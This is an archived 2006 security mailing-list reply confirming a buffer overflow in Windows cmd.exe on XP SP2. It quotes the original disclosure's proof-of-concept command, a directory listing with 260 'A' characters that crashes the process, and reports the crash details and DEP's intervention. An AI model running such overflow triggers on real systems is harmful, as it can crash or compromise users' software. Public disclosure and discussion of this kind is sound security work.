Vulnerability Development mailing list archives
Re: Windows Command Processor CMD.EXE Buffer Overflow
From: "Bernardo Wernesback" <bernardosw () gmail com>
Date: Mon, 23 Oct 2006 13:35:48 -0300
Reproduced the problem on Windows XP SP2 + All Patches English Version. EventType : BEX P1 : cmd.exe P2 : 5.1.2600.2180 P3 : 41107ebe P4 : unknown P5 : 0.0.0.0 P6 : 00000000 P7 : 00410041 P8 : c0000005 P9 : 00000008 DEP went into action and generated a dump to be sent to Microsoft for cmd.exe. On 10/19/06, gregory_panakkal <gregory_panakkal () fastmail fm> wrote:
Windows Command Processor CMD.EXE Buffer Overflow Tested on WinXP SP2 Impact - Very Low Copy-paste the following line in cmd.exe and execute it.. (it is a single command, has been split into multiple lines for readability sake). %COMSPEC% /K "dir \\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" (260 characters of 'A's) DEP Comes into the picture. URL : http://www.infogreg.com/security/misc/windows-command-processor-cmd.exe-buffer-overflow.html regards, Gregory Panakkal www.infogreg.com -- gregory_panakkal gregory_panakkal () fastmail fm -- http://www.fastmail.fm - I mean, what is it about a decent email service?
Current thread:
- RE: Windows Command Processor CMD.EXE Buffer Overflow, (continued)
- RE: Windows Command Processor CMD.EXE Buffer Overflow Osvaldo Casagrande (Oct 20)
- RE: Windows Command Processor CMD.EXE Buffer Overflow Marvin Simkin (Oct 21)
- RE: Windows Command Processor CMD.EXE Buffer Overflow Marvin Simkin (Oct 21)
- RE: Windows Command Processor CMD.EXE Buffer Overflow gregory_panakkal (Oct 21)
- Re: Windows Command Processor CMD.EXE Buffer Overflow Dan Yefimov (Oct 22)
- RE: Windows Command Processor CMD.EXE Buffer Overflow Luis Alberto Cortes Zavala (Oct 22)
- Re: Windows Command Processor CMD.EXE Buffer Overflow Dan Yefimov (Oct 23)
- Re: Windows Command Processor CMD.EXE Buffer Overflow Danux (Oct 23)
- RE: Windows Command Processor CMD.EXE Buffer Overflow Marvin Simkin (Oct 21)
- RE: Windows Command Processor CMD.EXE Buffer Overflow Marvin Simkin (Oct 23)
- RE: Windows Command Processor CMD.EXE Buffer Overflow Osvaldo Casagrande (Oct 20)
- Re: Windows Command Processor CMD.EXE Buffer Overflow Bernardo Wernesback (Oct 23)